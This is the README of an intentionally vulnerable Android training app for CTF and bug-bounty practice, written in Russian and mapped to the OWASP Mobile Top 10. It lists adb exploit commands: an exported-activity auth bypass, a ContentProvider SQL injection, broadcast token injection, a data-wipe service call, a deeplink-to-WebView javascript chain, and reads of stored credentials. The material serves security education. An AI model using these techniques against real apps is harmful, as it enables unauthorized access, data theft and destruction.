
Намеренно уязвимое Android-приложение для исследований в области мобильной безопасности и практики bug bounty — OWASP Mobile Top 10
Намеренно уязвимое Android-приложение для исследований в области мобильной безопасности, практики bug bounty и обучения в стиле CTF. Содержит 21 задокументированную уязвимость, сопоставленную с OWASP Mobile Top 10.
git clone [email protected]:b4sith-sec/Gu3ssWeak.git
cd Gu3ssWeak
./gradlew assembleDebug
adb install -r app/build/outputs/apk/debug/app-debug.apk
Запустите приложение, пройдите каждую лабораторию, соберите флаги и отправьте их на встроенной таблице результатов CTF.
| Категория | Уязвимости | Флаги |
|---|---|---|
| WebView | WV-01 to WV-05 | 5 |
| Deeplink | DL-01 to DL-04, DL-CHAIN | 5 |
| Auth / SQL Injection | SQL-01 | 1 |
| Admin Panel | AP-01 to AP-04 | 2 |
| ContentProvider | CP-01 | 1 |
| Broadcast Receiver | BR-01 to BR-03 | 2 |
| Service | SV-01, SV-02a, SV-02b | 2 |
| Network Interception | NET-01 | 1 |
| Banking / OTP | OTP-01 | 1 |
| LFI | LFI-01 | 1 |
| Storage | STORE-01 | 1 |
| XSS | XSS-01, XSS-02 | 2 |
Всего 20 флагов, плюс мастер-флаг, выдаваемый за сбор всех остальных.
| Список лабораторий | Таблица результатов CTF |
|---|---|
| lab |
# Admin panel - exported, no permission
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity --ez is_authenticated true
adb shell "content query --uri content://com.gu3sswe4k.app.contacts/contacts/1 --where \"1) OR (1=1\""
# Token injection via broadcast
adb shell am broadcast -a com.gu3sswe4k.app.SEND_TOKEN --es token FAKE --es user attacker
# Data wipe via exported service
adb shell am startservice -n com.gu3sswe4k.app/.services.DataSyncService --es action wipe_user_data
# Deeplink to WebView RCE chain
adb shell am start -a android.intent.action.VIEW -d "vulndroid://settings?redirect=com.gu3sswe4k.app.activities.WebViewActivity&url=javascript:VulnBridge.stealToken()"
# Read plaintext stored credentials
adb shell run-as com.gu3sswe4k.app cat /data/data/com.gu3sswe4k.app/shared_prefs/login_prefs.xml
# Watch for logged secrets
adb logcat | grep Gu3ssWeak
Этот проект носит исключительно образовательный характер. Все уязвимости намеренны и задокументированы. Показанные здесь техники применимы к реальным приложениям, но тестируйте только те системы, которыми владеете или на тестирование которых у вас есть разрешение. Полный отказ от ответственности и рекомендации по ответственному раскрытию см. в SECURITY.md.
MIT — см. LICENSE.